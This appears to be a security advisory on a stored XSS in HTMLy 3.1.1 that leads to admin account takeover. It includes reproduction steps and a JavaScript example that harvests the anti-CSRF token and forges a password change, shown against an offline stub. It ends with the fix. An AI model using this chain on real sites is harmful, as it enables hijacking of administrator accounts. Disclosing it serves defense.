HTMLy
cpe:2.3:a:htmly:htmly:*:*:*:*:*:*:*
- 3.1.1
A stored Cross-Site Scripting (XSS) vulnerability has been identified in HTMLy version 3.1.1. The issue lies in the content creation feature at the '/add/content?type=image' endpoint, where the application does not adequately sanitize or encode user input in the content field. An authenticated low-privileged user can therefore inject JavaScript that is stored with the post and executed when an administrator views it. Because the script runs in the administrator's browser session, it can fetch the administrator's password change page, read the CSRF token from it, and submit a password change request carrying that token, resulting in a complete takeover of the admin account.
Exploitation allows arbitrary JavaScript to execute in the context of an administrator's browser session. The anti-CSRF token offers no protection here: the injected script runs in the application's own origin, so it can retrieve a valid token dynamically before issuing the forged request. The result is unauthorized modification of the admin credentials and full compromise of the application.
To reproduce this vulnerability, log in to HTMLy with a low-privileged user account and navigate to the '/add/content?type=image' endpoint. Insert a payload into the content field that includes a script which fetches the admin password change page and extracts the CSRF token from it. Once the content is published, log in as an administrator, go to the '/admin/posts' section, and open the malicious post. The injected script executes, retrieves the CSRF token, and sends a password change request with it, allowing the attacker to take over the admin account.
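The attack chain described above, written out as an added example. This is not HTMLy's code and not the advisory's payload; it shows only the generic token-harvesting logic that a stored script running in the administrator's origin would perform. The path '/admin/password', the field names 'csrf_token', 'password' and 'password_confirm', and the stub server are assumptions for illustration (the advisory does not name HTMLy's actual form fields); the stub stands in for the network so the block runs offline.

```javascript
// Added example: stored XSS -> same-origin fetch of the password page ->
// harvest anti-CSRF token -> replay it in a forged password change.
// All paths and field names below are ASSUMED for illustration.

const PASSWORD_PAGE = "/admin/password";   // assumed path of the admin password change page
const TOKEN_FIELD = "csrf_token";          // assumed name of the hidden anti-CSRF input

// Return the value of the hidden input named `fieldName`, or null if absent.
// Attribute order is not assumed; the tag is located first, then its attributes read.
function extractToken(html, fieldName = TOKEN_FIELD) {
  for (const [tag] of html.matchAll(/<input\b[^>]*>/gi)) {
    const name = tag.match(/\bname=["']([^"']*)["']/i);
    if (!name || name[1] !== fieldName) continue;
    const value = tag.match(/\bvalue=["']([^"']*)["']/i);
    return value ? value[1] : null;
  }
  return null;
}

// The chain itself. `fetchImpl` is injected so the example runs offline against a
// stub; in the victim's browser it would simply be window.fetch, and the cookies of
// the logged-in administrator are attached automatically because the request is
// same-origin. This is why an anti-CSRF token does not stop an XSS attacker.
async function changeAdminPassword(fetchImpl, newPassword) {
  const page = await fetchImpl(PASSWORD_PAGE, { credentials: "same-origin" });
  const token = extractToken(await page.text());
  if (!token) throw new Error("no anti-CSRF token found on the password page");

  const body = new URLSearchParams({
    [TOKEN_FIELD]: token,            // the freshly harvested token
    password: newPassword,           // assumed field names for the new password
    password_confirm: newPassword,
  });
  const resp = await fetchImpl(PASSWORD_PAGE, {
    method: "POST",
    credentials: "same-origin",
    headers: { "Content-Type": "application/x-www-form-urlencoded" },
    body: body.toString(),
  });
  return { token, status: resp.status };
}

// Constructed stub of the server side: GET hands out a per-session token in a hidden
// input, POST is accepted only when that token is echoed back. This is exactly the
// check the harvesting step defeats.
function makeStubServer(token = "constructed-token") {
  const state = { password: "original", requests: [] };
  const fetchImpl = async (url, init = {}) => {
    const method = init.method || "GET";
    state.requests.push({ url, method });
    if (method === "GET") {
      const html =
        `<form method="post"><input value="${token}" type="hidden" name="${TOKEN_FIELD}">` +
        `<input type="password" name="password"></form>`;
      return { status: 200, text: async () => html };
    }
    const params = new URLSearchParams(init.body);
    if (params.get(TOKEN_FIELD) !== token) return { status: 403, text: async () => "bad token" };
    state.password = params.get("password");
    return { status: 200, text: async () => "ok" };
  };
  return { fetchImpl, state };
}

// Stand-alone run against the stub.
if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  const server = makeStubServer();
  changeAdminPassword(server.fetchImpl, "attacker-chosen").then((r) =>
    console.log(`token=${r.token} status=${r.status} password now "${server.state.password}"`));
}
```

The stub's token check passes because the script reads the token from the same origin it is about to attack; token-based CSRF defenses therefore do not mitigate stored XSS. The fix is contextual output encoding of the stored content field (and ideally a restrictive Content-Security-Policy as defense in depth), not a stronger CSRF token.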